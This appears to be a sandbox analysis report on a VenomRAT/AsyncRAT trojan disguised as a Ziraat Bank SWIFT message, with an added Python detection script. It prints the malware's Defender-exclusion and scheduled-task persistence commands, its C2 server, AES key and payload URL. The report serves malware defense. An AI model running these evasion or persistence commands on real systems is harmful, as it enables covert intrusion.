

Windows Analysis Report
Ziraat Bankasi Swift Mesaji.dqy.dll

Overview

General Information

Sample name: Ziraat Bankasi Swift Mesaji.dqy.dll
(renamed file extension from exe to dll)
Original sample name: Ziraat Bankasi Swift Mesaji.dqy.exe
Analysis ID: 1572391
MD5: d8debe62cb0e2fee8f1d740ba963cc71
SHA1: c1e39bee02a0a141d852921ccd2f0054b8458c58
SHA256: f95616ad77ada13b28ccb8cb4627c8f9af26c0bf46470da06e5c109a58ee8492
Tags: dqy, exe, geo, TUR, ZiraatBank, user-abuse_ch

Detection

AsyncRAT, VenomRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll64.exe (PID: 5948 cmdline: loaddll64.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7004 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5776 cmdline: rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • regasms.exe (PID: 6696 cmdline: C:\Users\user\AppData\Roaming\regasms.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
          • powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • regasms.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Roaming\regasms.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
            • cmd.exe (PID: 6960 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 4016 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 1252 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
              • NotepadUpdate.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Roaming\NotepadUpdate.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
    • rundll32.exe (PID: 4692 cmdline: rundll32.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll,xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1476 cmdline: rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • regasms.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\regasms.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
        • powershell.exe (PID: 7640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7664 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • regasms.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Roaming\regasms.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
          • cmd.exe (PID: 1748 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7324 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
  • AtkzppDHiyvcIR.exe (PID: 7628 cmdline: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
    • schtasks.exe (PID: 8148 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AtkzppDHiyvcIR.exe (PID: 6880 cmdline: "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
    • AtkzppDHiyvcIR.exe (PID: 6968 cmdline: "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe" MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
  • NotepadUpdate.exe (PID: 4308 cmdline: C:\Users\user\AppData\Roaming\NotepadUpdate.exe MD5: AE806B6F5E02484C2BE2B49DA35B3D26)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
{"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "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", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source | Rule | Description | Author | Strings
0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
Process Memory Space: regasms.exe PID: 6696 | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(6 entries in total; remaining entries not shown)
Source | Rule | Description | Author | Strings
15.2.regasms.exe.3230128.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
15.2.regasms.exe.3230128.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xda86:$q1: Select * from Win32_CacheMemory
  • 0xdac6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xdb14:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xdb62:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
13.2.regasms.exe.28be350.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
13.2.regasms.exe.28be350.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xda86:$q1: Select * from Win32_CacheMemory
  • 0xdac6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xdb14:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xdb62:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
13.2.regasms.exe.28d0c2c.1.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(21 entries in total; remaining entries not shown)

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\regasms.exe", ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 7464, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit, ProcessId: 6960, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", ProcessId: 7292, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", ProcessId: 7320, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe", ProcessId: 7292, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\regasms.exe, ParentImage: C:\Users\user\AppData\Roaming\regasms.exe, ParentProcessId: 6696, ParentProcessName: regasms.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp", ProcessId: 7320, ProcessName: schtasks.exe
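The Sigma hits listed under System Summary and here are the evidence. What follows is an added example, not part of the Joe Sandbox report and not the Sigma rules' own logic: it re-implements the same four checks (Defender exclusion via Add-MpPreference, schtasks /Create from an XML in Temp, a logon-triggered task whose action lives under AppData, and an AppData-resident parent spawning cmd/powershell/schtasks) in Python and runs them over process-creation records reconstructed from this report's process tree (PIDs, images and command lines as listed there), plus two constructed benign records that must stay quiet. The record fields and the rule names are my own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields a Sysmon EID 1 / Security 4688 event carries)."""
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


# Records reconstructed from the process tree in this report (PIDs, images and command
# lines as listed there). The last two are constructed benign controls that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(6696, r"C:\Users\user\AppData\Roaming\regasms.exe",
              r"C:\Users\user\AppData\Roaming\regasms.exe",
              5776, r"C:\Windows\System32\rundll32.exe"),
    ProcEvent(7292, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
              r'-ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"',
              6696, r"C:\Users\user\AppData\Roaming\regasms.exe"),
    ProcEvent(7320, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"',
              6696, r"C:\Users\user\AppData\Roaming\regasms.exe"),
    ProcEvent(6960, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest '
              r"""/tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit""",
              7464, r"C:\Users\user\AppData\Roaming\regasms.exe"),
    ProcEvent(4016, r"C:\Windows\SysWOW64\schtasks.exe",
              r"""schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" """
              r"""/tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'""",
              6960, r"C:\Windows\SysWOW64\cmd.exe"),
    # constructed benign controls: a vendor installer registering a task, and an admin query
    ProcEvent(9001, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Vendor\Update" '
              r'/XML "C:\Program Files\Vendor\update.xml"',
              9000, r"C:\Program Files\Vendor\setup.exe"),
    ProcEvent(9003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-MpPreference",
              9002, r"C:\Windows\explorer.exe"),
]

LOLBINS = {"powershell.exe", "pwsh.exe", "schtasks.exe", "cmd.exe"}
RE_DEFENDER_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(?:path|process|extension)", re.I)
RE_SCHTASKS_CREATE = re.compile(r"/create\b", re.I)
RE_XML_FROM_TEMP = re.compile(r'/xml\s+"?[^"]*\\temp\\', re.I)
RE_ONLOGON = re.compile(r"/sc\s+onlogon\b", re.I)
RE_TR_IN_APPDATA = re.compile(r"""/tr\s+['"]*[^'"]*\\appdata\\""", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_appdata(path: str) -> bool:
    return "\\appdata\\" in path.lower()


def rule_defender_exclusion(e: ProcEvent) -> bool:
    """PowerShell adding a Defender exclusion (the Add-MpPreference line in the tree)."""
    return basename(e.image) in {"powershell.exe", "pwsh.exe"} and bool(RE_DEFENDER_EXCLUSION.search(e.cmdline))


def rule_schtasks_xml_from_temp(e: ProcEvent) -> bool:
    """schtasks /Create importing its task definition from a Temp directory."""
    cl = e.cmdline
    return basename(e.image) == "schtasks.exe" and bool(RE_SCHTASKS_CREATE.search(cl) and RE_XML_FROM_TEMP.search(cl))


def rule_schtasks_onlogon_appdata(e: ProcEvent) -> bool:
    """Logon-triggered task whose action lives under AppData (the NotepadUpdate task)."""
    cl = e.cmdline
    return basename(e.image) == "schtasks.exe" and bool(
        RE_SCHTASKS_CREATE.search(cl) and RE_ONLOGON.search(cl) and RE_TR_IN_APPDATA.search(cl))


def rule_appdata_parent_spawns_lolbin(e: ProcEvent) -> bool:
    """A binary running from AppData launching cmd, powershell or schtasks."""
    return in_appdata(e.parent_image) and basename(e.image) in LOLBINS


RULES = {
    "defender_exclusion": rule_defender_exclusion,
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
    "schtasks_onlogon_appdata": rule_schtasks_onlogon_appdata,
    "appdata_parent_spawns_lolbin": rule_appdata_parent_spawns_lolbin,
}


def evaluate(events):
    """Return one (rule_name, pid) pair for every rule that matches each event."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name:30s} pid={pid}")
```

On the sample above, the two regasms.exe children (PIDs 7292 and 7320) each fire twice (the specific rule plus the AppData-parent rule), the cmd.exe wrapper fires only the parent rule, and the inner schtasks.exe (PID 4016) fires only the onlogon/AppData rule because its parent is cmd.exe in SysWOW64; both constructed controls stay quiet. The parent-image check is the one that generalises beyond this family, since the `/XML`-from-Temp and `/sc onlogon` patterns are easy to change in a builder but a payload dropped to %AppData% still has to spawn something to persist.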
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T14:21:40.286613+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 163.44.198.57 | 443 | TCP
2024-12-10T14:21:41.350116+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 163.44.198.57 | 443 | TCP
2024-12-10T14:22:06.671516+0100 | 2052267 | 1 | Domain Observed Used for C2 Detected | 185.208.158.187 | 4449 | 192.168.2.7 | 49756 | TCP
2024-12-10T14:22:06.671516+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 185.208.158.187 | 4449 | 192.168.2.7 | 49756 | TCP



AV Detection

Source: Ziraat Bankasi Swift Mesaji.dqy.dll | Avira: detected
Source: https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exe | Avira URL Cloud: Label: malware
Source: https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exe | Avira URL Cloud: Label: malware
Source: https://52575815-38-20200406120634.webstarterz.com/ | Avira URL Cloud: Label: malware
Source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VenomRAT {"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "185.208.158.187", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "NotepadUpdate.exe", "AES_key": "Ijk68MD56nk4n4T5u0ZGNHKlucnIy5B2", "Mutex": "tnybaidkzovl", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "A4QJGpJy/V4cCbTnbG8X0PYHWV+LKegq58mj1q2ZoZfA9x2FqmL8bhLOPQGSBEmtgnKkbETqeRPrsSNvJO3utAVaR5kG3pnQrTTE4Lpy9we7minikcrB8f5ahxH3VCeDhOHw6yDiQnmF1keRGK6R8QzedMamHwNFpeTFBVGJSwg=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "10", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | ReversingLabs: Detection: 26%
